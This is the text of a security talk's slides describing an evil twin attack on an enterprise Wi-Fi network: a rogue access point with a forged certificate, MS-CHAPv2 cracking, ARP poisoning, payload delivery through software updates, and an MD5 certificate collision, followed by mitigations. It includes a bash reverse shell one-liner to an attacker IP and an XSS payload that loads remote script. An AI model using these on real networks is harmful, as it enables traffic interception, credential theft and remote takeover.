This presentation explains a way to hack enterprise wireless network using evil twin attack. All the encrypted traffic can be sniffed in plain text.

1. Navneet Kumar

2. Overview
• Demo
• OSI Protocols Overview
• Evil Twin Attack
• Cryptanalysis : MS-CHAPv2
• ARP poisoning
• POST-MITM Attack vectors
• Reverse Shell
• Mitigations
• Certificate Collision Attack
Note: Some Images in this presentation has been taken from web for illustration

3. SilverFish Worm
XSS
NPAPI
runtime
Shell
<img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')
masterPlugin.updatePlugin(“attacker-plugin”,success,failure)
Netcat Shell / ssh daemon / Bounjour
Hatching rate = ng
n=Average # of endpoints per meeting
g=# of generation
g=0
g=1
g=2

4. 802.11
ARP
Target Protocols
Attack Vectors

5. 802.11

6. Evil twin attack

7. Fake Certificate Exchange

8. Soft AP
•Put WNIC in Master Mode and use Forged CA cert
•Configure AP SSID to “bjn-int”
•DAUTH to actual AP
Network
•Setup DNS
•Setup DHCP
Routing
•Redirect 80,443 packets to proxy port
•Forward traffic after NAT
Capture
•Use Same CA cert for signing
•Sniff in proxy
Attack Setup
Note: Chrome uses certificate pinning for *.google.com

9. Fake BSSID
Highest Strength
2.4 GHz Channel
Wireless Scan

10. Victim’s Client

11. WTF !!!
Certificate Forgery

12. Soft AP DHCP
Routing Proxy

13. Cryptanalysis of MS-CHAPv2
ChallengeHash = SHA1(random|| username)[0:8]
ChallengeHash
ChallengeResponse
Note: Original complexity analysis has been done by Moxie Marlinspike

14. Cryptanalysis of MS-CHAPv2
Note: Original complexity analysis has been done by Moxie Marlinspike
7 byte 7 byte 2 byte
Complexity = 256
time < 24 hrs
( 100% success )

15. ARP poisoning

16. POST-MITM Attack Vectors
Reverse Shell
Bind Shell
Session Hijacking
Above L3 Attacks

17. Reverse Bind Shell
• Give a network shell to attacker
• Works Behind NAT
• Gets Root Access
HOW ????
$ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1

18. https://tools.google.com/service/update2
https://swdl.bluejeans.com
https://aus4.mozilla.org/update/*/update.xml
smb://MVAV01/SophosUpdate
(Auto)Updates
DeployPayloadwithupdates

19. Mitigation
Pre-deployment of enterprise wide CA
SSL Cert Pinning for updates
Proper WIPS Configuration
Arp Spoof Mitigations
Careful CA signing

20. Certificate Collision Attack
CA
DomainA
isCA?
CSR Ekey[Sha(csr.tbs)]
DomainA
isCA?
DomainA
isCA?
CertificateCSR.TBS
Sha( domainA.csr ) Sha( domainB.csr )
md5( domainA.csr
)
md5( domainB.csr )
True
False
MD5 Collision
Certificate Collision